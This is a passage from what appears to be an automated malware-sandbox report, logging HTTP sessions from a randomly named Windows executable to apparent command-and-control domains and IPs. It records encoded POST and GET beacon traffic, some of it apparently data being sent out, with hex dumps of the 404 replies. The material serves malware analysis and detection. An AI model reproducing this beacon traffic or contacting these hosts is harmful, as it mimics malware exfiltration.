[TRUNCATED]
                                Data Ascii: 7b6X[~`d[jn{fm~%@}$jDD$5;AAmP />0`3_qvft]Iy{g"?}0m/$LO_Tl1)UI=O3OaL/b:5tI\0%"y.=4tW-=/slo0biFr_$1F>h?C3Oe 64b2I7$|TCV)Oo+p:g~~!^Xd|DB&FBFgLv_tMq$Np,4B1&8>pvK">{QMq))&Q$1II1X$'4I1-0xW,JHQbU<JKXUxA$08Iq<TCAxN'8&fc"5s0G1 yp[%2((0' r5X&U^02g<%o349$gsDDQ&H|f$pltO_7:a*s4uhEaq~F<dl-L>IWJ3BHKYK<h}#LiXe]J>#KS+u*2n}tr0O:_YrW]`$'h9sIV`B"%Wj@~B+{x{$H{0cAV"c2_oWo>`$W>KLBx PwBauh2M46:a6ecr8Rd-IYByuG>~)pA [TRUNCATED]
                                Sep 23, 2024 14:40:11.121361971 CEST962INData Raw: 61 27 08 da 00 a0 6e 41 dd 78 6d 1b 88 06 4d 88 7c 73 25 50 7f 10 b5 86 e4 25 49 58 a5 82 09 d4 a1 45 5e 4d 22 ad 65 a6 27 64 24 11 e7 c1 08 8d d0 de a8 5c 22 39 8f c8 a3 93 13 5c ff 1f 0d 46 87 8f 3b 7e 3a 80 09 ae c9 b1 c8 85 0c 1e a6 69 ea 16
                                Data Ascii: a'nAxmM|s%P%IXE^M"e'd$\"9\F;~:iy_WfA+M:8}O&fQ3bgc3'jGBv`8Z[f(t&vpoH-6)5D!lx9h96{4T6WgoQbKg@j9:XoPJ


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                51192.168.2.749755154.38.114.205803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:40:12.581899881 CEST1794OUTPOST /xedw/ HTTP/1.1
                                Host: www.2024tengxun361.buzz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.2024tengxun361.buzz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.2024tengxun361.buzz/xedw/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 76 57 55 61 59 4f 76 42 4e 46 51 46 37 48 54 71 6b 6b 77 6c 30 53 77 38 73 68 6b 51 4a 35 6a 76 32 37 67 75 69 76 49 71 38 77 36 31 49 64 77 71 6c 68 56 49 45 6e 56 58 79 6d 30 51 65 6e 68 39 35 38 41 4e 54 52 58 71 75 58 41 73 41 41 34 66 71 72 39 70 69 6a 77 63 62 6e 4a 67 59 61 39 6d 37 48 52 38 74 47 2b 31 2b 65 58 38 76 62 62 2b 38 58 48 57 63 68 6a 6b 64 4e 36 6d 62 69 44 5a 4a 74 64 70 47 52 54 4e 73 2f 77 45 31 33 49 6b 78 50 31 53 68 5a 77 48 46 4a 55 68 30 30 33 4e 4b 6c 41 75 61 33 53 6d 78 66 38 34 37 6f 43 63 76 61 67 77 52 58 46 36 36 76 33 39 6e 59 31 55 67 44 64 52 32 6c 68 70 4b 79 56 54 78 78 44 4f 56 31 53 70 2b 77 7a 66 64 66 4d 77 77 49 32 52 6d 63 67 56 62 69 38 77 68 67 64 4f 6f 2b 43 54 79 43 68 69 69 4e 4d 66 78 32 33 58 31 51 6d 2f 31 63 62 57 34 73 49 31 37 50 58 6f 5a 37 58 32 73 52 47 48 6b 55 64 2f 2b 4c 72 44 39 64 68 42 45 71 32 4a 51 6f 36 46 36 47 55 4a 4b 2f 6b 79 53 36 77 78 78 6c 4f 50 64 34 4b 2b 44 4a 6c 70 64 7a 67 69 59 43 75 4d 6f 69 6e 77 62 58 6e [TRUNCATED]
                                Data Ascii: 76=vWUaYOvBNFQF7HTqkkwl0Sw8shkQJ5jv27guivIq8w61IdwqlhVIEnVXym0Qenh958ANTRXquXAsAA4fqr9pijwcbnJgYa9m7HR8tG+1+eX8vbb+8XHWchjkdN6mbiDZJtdpGRTNs/wE13IkxP1ShZwHFJUh003NKlAua3Smxf847oCcvagwRXF66v39nY1UgDdR2lhpKyVTxxDOV1Sp+wzfdfMwwI2RmcgVbi8whgdOo+CTyChiiNMfx23X1Qm/1cbW4sI17PXoZ7X2sRGHkUd/+LrD9dhBEq2JQo6F6GUJK/kyS6wxxlOPd4K+DJlpdzgiYCuMoinwbXnGWe81Uyl0meG986PV15UhmLpP8qAOgp3ZexwvkMt8yu3hxCrP2kSHuFRyIq2/Pc8aZ55i+dm5fZyHNACq7zOApCSiQ81v/2Y9FhzLCql7fC6uIS6gKY6cS6ivFVetyMdDUxki0MIGCixwOCGbjU4iA7YUrTnxzpbMRaKwU0OaPY8axthXoUA3WULLBOGW3x3Mon+RqueSbPzgvHjceaxHAOJCWjaF2VI2ZEFbnIChaHmFZz6mCzwqXGyrpc1QVfxrsxlVx07/NfC2ATG3F23nj3tZyg9YqXvqZ5xIouqibGd9JL/XO+ACN+qk5fOyV/06D2SVu55hpa6Y8vR1WHhW9kOZ/Ryy2ayTwCmKkWWGVuBVlI/n90RWJ2H5eBXmJAEduBO2vDeBe6QOew5AwhEiM1i2S2Tkd3XDLghwxYGpAJULJnkJAwLbONhR4xf+Zowh8VpwdRzVp+7eAjxDZPD+6ymkzosUsF4bE9eFw0dZ0gqy9Z+taKpo34MIaFVZWffxlWvNtzWB2zugLH2t8jH+bkWUZpHDsn6CwTha0nCy6EFco73v26BPMExZh0bNTFl57LHReElchb42VSG75Tou8N8fEjGcAtxGo+izQtFGvbPf0FzPfR+kSdR7AaOKce1s3ls6CPT6k5NUOPyw4/OjvUyRps5/vHZEh [TRUNCATED]
                                Sep 23, 2024 14:40:14.269282103 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:13 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Data Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 [TRUNCATED]
                                Data Ascii: 7b6X[~`d[jn{fm~%@}$jDD$5;AAmP />0`3_qvft]Iy{g"?}0m/$LO_Tl1)UI=O3OaL/b:5tI\0%"y.=4tW-=/slo0biFr_$1F>h?C3Oe 64b2I7$|TCV)Oo+p:g~~!^Xd|DB&FBFgLv_tMq$Np,4B1&8>pvK">{QMq))&Q$1II1X$'4I1-0xW,JHQbU<JKXUxA$08Iq<TCAxN'8&fc"5s0G1 yp[%2((0' r5X&U^02g<%o349$gsDDQ&H|f$pltO_7:a*s4uhEaq~F<dl-L>IWJ3BHKYK<h}#LiXe]J>#KS+u*2n}tr0O:_YrW]`$'h9sIV`B"%Wj@~B+{x{$H{0cAV"c2_oWo>`$W>KLBx PwBauh2M46:a6ecr8Rd-IYByuG>~)pA [TRUNCATED]
                                Sep 23, 2024 14:40:14.269383907 CEST962INData Raw: 61 27 08 da 00 a0 6e 41 dd 78 6d 1b 88 06 4d 88 7c 73 25 50 7f 10 b5 86 e4 25 49 58 a5 82 09 d4 a1 45 5e 4d 22 ad 65 a6 27 64 24 11 e7 c1 08 8d d0 de a8 5c 22 39 8f c8 a3 93 13 5c ff 1f 0d 46 87 8f 3b 7e 3a 80 09 ae c9 b1 c8 85 0c 1e a6 69 ea 16
                                Data Ascii: a'nAxmM|s%P%IXE^M"e'd$\"9\F;~:iy_WfA+M:8}O&fQ3bgc3'jGBv`8Z[f(t&vpoH-6)5D!lx9h96{4T6WgoQbKg@j9:XoPJ
                                Sep 23, 2024 14:40:14.269721031 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:13 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Data Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 [TRUNCATED]
                                Data Ascii: 7b6X[~`d[jn{fm~%@}$jDD$5;AAmP />0`3_qvft]Iy{g"?}0m/$LO_Tl1)UI=O3OaL/b:5tI\0%"y.=4tW-=/slo0biFr_$1F>h?C3Oe 64b2I7$|TCV)Oo+p:g~~!^Xd|DB&FBFgLv_tMq$Np,4B1&8>pvK">{QMq))&Q$1II1X$'4I1-0xW,JHQbU<JKXUxA$08Iq<TCAxN'8&fc"5s0G1 yp[%2((0' r5X&U^02g<%o349$gsDDQ&H|f$pltO_7:a*s4uhEaq~F<dl-L>IWJ3BHKYK<h}#LiXe]J>#KS+u*2n}tr0O:_YrW]`$'h9sIV`B"%Wj@~B+{x{$H{0cAV"c2_oWo>`$W>KLBx PwBauh2M46:a6ecr8Rd-IYByuG>~)pA [TRUNCATED]
                                Sep 23, 2024 14:40:14.269926071 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:13 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Data Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 [TRUNCATED]
                                Data Ascii: 7b6X[~`d[jn{fm~%@}$jDD$5;AAmP />0`3_qvft]Iy{g"?}0m/$LO_Tl1)UI=O3OaL/b:5tI\0%"y.=4tW-=/slo0biFr_$1F>h?C3Oe 64b2I7$|TCV)Oo+p:g~~!^Xd|DB&FBFgLv_tMq$Np,4B1&8>pvK">{QMq))&Q$1II1X$'4I1-0xW,JHQbU<JKXUxA$08Iq<TCAxN'8&fc"5s0G1 yp[%2((0' r5X&U^02g<%o349$gsDDQ&H|f$pltO_7:a*s4uhEaq~F<dl-L>IWJ3BHKYK<h}#LiXe]J>#KS+u*2n}tr0O:_YrW]`$'h9sIV`B"%Wj@~B+{x{$H{0cAV"c2_oWo>`$W>KLBx PwBauh2M46:a6ecr8Rd-IYByuG>~)pA [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                52192.168.2.749756154.38.114.205803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:40:15.398166895 CEST484OUTGET /xedw/?mtJD_=fvdlJ2L&76=iU86b+DQDkc5+HCYi3wksyID7wIiKcPt1qIOrYUg5TrYQuRHlXYNPzVksVl/dHByk+JFXw+Aj1EfBi5c9qhjsEIOS1JRVa1wxHxBhUP989bRn8j6x1DUcRzlbseaRz6IPahZbjf8tblS HTTP/1.1
                                Host: www.2024tengxun361.buzz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:40:16.345779896 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:16 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Data Raw: 31 34 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f [TRUNCATED]
                                Data Ascii: 1411<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <link rel="shortcut icon" href="/assets/img/favicon.ico" /> <style> * {-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;} html,body,div,span,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,abbr,address,cite,code,del,dfn,em,img,ins,kbd,q,samp,small,strong,sub,sup,var,b,i,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,caption,article,aside,canvas,details,figcaption,figure,footer,header,hgroup,menu,nav,section,summary,time,mark,audio,video {margin:0;padding:0;border:0;outline:0;vertical-align:baseline;background:transparent;} article,aside,details,figcaption,figure,footer,header,hgroup,nav,section {display:block;} html {font-size:16px;line-height:24px;wi [TRUNCATED]
                                Sep 23, 2024 14:40:16.345798016 CEST1236INData Raw: 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 7d 0a 20 20 20
                                Data Ascii: ze-adjust:100%;-ms-text-size-adjust:100%;overflow-y:scroll;overflow-x:hidden;} img {vertical-align:middle;max-width:100%;height:auto;border:0;-ms-interpolation-mode:bicubic;} body {min-height:100%;background:#f4f6f8;text-render
                                Sep 23, 2024 14:40:16.345805883 CEST1236INData Raw: 65 72 2d 73 70 61 63 69 6e 67 3a 2d 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 63 6f 6c 6f 72 3a 23 37 37 37 3b 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 77 72 61 70 70 65 72 20 2e 73 75 62 68 65
                                Data Ascii: er-spacing:-1px;margin-bottom:20px;color:#777;} .error-page-wrapper .subheader {transition:color .2s linear;font-size:32px;line-height:46px;color:#494949;} .error-page-wrapper .hr {height:1px;background-color:#eee;width:80%;max
                                Sep 23, 2024 14:40:16.346045017 CEST1236INData Raw: 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 77 72 61 70 70 65 72 20 7b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 35 25 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 77 72 61 70 70 65 72 20 2e 63 6f
                                Data Ascii: .error-page-wrapper {padding:30px 5%;} .error-page-wrapper .content-container {padding:37px;position:static;left:0;margin-top:0;margin-left:0;} .error-page-wrapper .head-line {font-size:36px;} .error
                                Sep 23, 2024 14:40:16.346060038 CEST394INData Raw: 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 e6 a8 a1 e5 9d 97 e4 b8 8d e5 ad 98 e5 9c a8 3a 78 65 64 77 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63
                                Data Ascii: div> <div class="subheader"> :xedw </div> <div class="hr"></div> <div class="context"> <p> </p> </div> <div class="buttons-container">


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                53192.168.2.74975784.32.84.32803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:40:21.475891113 CEST770OUTPOST /8xob/ HTTP/1.1
                                Host: www.bodegamayorista.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bodegamayorista.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.bodegamayorista.online/8xob/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 4e 33 51 50 42 50 30 43 61 32 34 59 63 43 75 42 34 46 6e 43 54 33 6b 61 44 47 47 55 46 52 43 6f 44 4c 61 32 36 6d 47 4f 63 4f 31 44 50 68 58 4f 47 51 35 5a 6b 69 47 38 56 32 6d 43 2b 79 58 54 58 51 67 44 72 69 76 69 7a 51 36 59 65 67 6a 77 69 38 6f 76 64 6d 6f 32 56 2f 6f 5a 4d 48 4f 73 37 30 43 4d 50 7a 51 6c 53 68 50 48 54 33 39 35 35 7a 70 65 39 74 55 47 62 37 66 51 77 57 4f 52 4c 2f 6e 62 43 56 51 4a 42 70 32 4a 6d 75 5a 7a 2b 46 78 67 59 7a 4a 31 54 37 41 6a 42 6f 76 57 71 74 2f 6c 77 59 45 6c 4c 73 6d 4e 78 74 4b 77 61 51 41 6c 6a 37 39 5a 70 4c 42 46 68 49 56 6b 78 59 6c 4c 46 59 4c 52 66 4e 63 73 32 34 71 48 39 67 3d 3d
                                Data Ascii: 76=N3QPBP0Ca24YcCuB4FnCT3kaDGGUFRCoDLa26mGOcO1DPhXOGQ5ZkiG8V2mC+yXTXQgDrivizQ6Yegjwi8ovdmo2V/oZMHOs70CMPzQlShPHT3955zpe9tUGb7fQwWORL/nbCVQJBp2JmuZz+FxgYzJ1T7AjBovWqt/lwYElLsmNxtKwaQAlj79ZpLBFhIVkxYlLFYLRfNcs24qH9g==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                54192.168.2.74975884.32.84.32803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:40:24.023880005 CEST790OUTPOST /8xob/ HTTP/1.1
                                Host: www.bodegamayorista.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bodegamayorista.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.bodegamayorista.online/8xob/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 4e 33 51 50 42 50 30 43 61 32 34 59 54 43 65 42 30 47 50 43 66 48 6b 5a 61 32 47 55 4d 78 44 6a 44 4c 65 32 36 6e 43 65 63 38 52 44 50 42 48 4f 48 52 35 5a 6a 69 47 38 64 57 6d 39 68 69 57 2b 58 51 39 2b 72 6a 6a 69 7a 55 61 59 65 68 54 77 69 50 77 6f 63 32 6f 77 54 2f 6f 68 52 58 4f 73 37 30 43 4d 50 33 41 4c 53 69 2f 48 53 48 74 35 35 57 46 5a 2b 74 55 46 63 37 66 51 68 47 4f 56 4c 2f 6e 70 43 52 51 6a 42 72 2b 4a 6d 76 70 7a 2b 51 64 6a 52 7a 4a 7a 4f 4c 41 74 42 4e 43 73 6c 4f 50 68 78 5a 34 48 42 64 7a 6d 39 37 58 53 41 79 4d 4a 39 71 46 69 74 4a 6c 7a 32 75 49 52 7a 5a 68 54 49 36 2f 77 41 36 35 47 37 71 4c 44 72 61 5a 47 49 53 63 36 43 35 41 77 59 32 30 5a 44 61 5a 32 69 71 51 3d
                                Data Ascii: 76=N3QPBP0Ca24YTCeB0GPCfHkZa2GUMxDjDLe26nCec8RDPBHOHR5ZjiG8dWm9hiW+XQ9+rjjizUaYehTwiPwoc2owT/ohRXOs70CMP3ALSi/HSHt55WFZ+tUFc7fQhGOVL/npCRQjBr+Jmvpz+QdjRzJzOLAtBNCslOPhxZ4HBdzm97XSAyMJ9qFitJlz2uIRzZhTI6/wA65G7qLDraZGISc6C5AwY20ZDaZ2iqQ=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                55192.168.2.74975984.32.84.32803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:40:26.567243099 CEST1803OUTPOST /8xob/ HTTP/1.1
                                Host: www.bodegamayorista.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bodegamayorista.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.bodegamayorista.online/8xob/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 4e 33 51 50 42 50 30 43 61 32 34 59 54 43 65 42 30 47 50 43 66 48 6b 5a 61 32 47 55 4d 78 44 6a 44 4c 65 32 36 6e 43 65 63 38 5a 44 4d 79 2f 4f 47 79 68 5a 69 69 47 38 43 6d 6d 38 68 69 58 38 58 51 6b 31 72 6a 66 63 7a 57 69 59 65 44 62 77 6b 2b 77 6f 46 6d 6f 77 66 66 6f 61 4d 48 50 78 37 30 54 45 50 7a 6b 4c 53 69 2f 48 53 43 68 35 37 44 70 5a 34 74 55 47 62 37 66 63 77 57 4f 39 4c 2f 2b 63 43 52 55 5a 43 66 4b 4a 6e 4d 52 7a 38 69 6c 6a 61 7a 4a 78 65 62 42 72 42 4e 47 4a 6c 50 6a 58 78 5a 4d 39 42 66 54 6d 2b 73 7a 4c 63 6d 46 52 71 61 41 2f 6d 72 46 45 78 65 68 68 72 4c 35 59 4f 59 76 4c 4e 74 78 48 69 59 2f 4e 67 66 45 6d 4b 42 35 45 4a 35 68 70 64 68 39 42 51 4a 31 53 2f 64 51 41 56 41 6c 75 2b 74 35 4d 39 53 47 51 37 4c 73 54 59 67 52 39 4f 34 51 46 71 33 2b 2b 61 49 54 62 2f 61 77 6e 62 62 46 4a 58 70 32 62 6b 4f 52 73 7a 46 73 7a 35 39 2f 4c 66 4e 52 65 53 4c 37 39 31 4f 58 74 63 6a 66 59 50 56 49 52 49 71 58 70 77 78 45 66 69 49 38 44 37 45 2b 61 78 76 68 73 6f 53 4c 4d 51 32 58 [TRUNCATED]
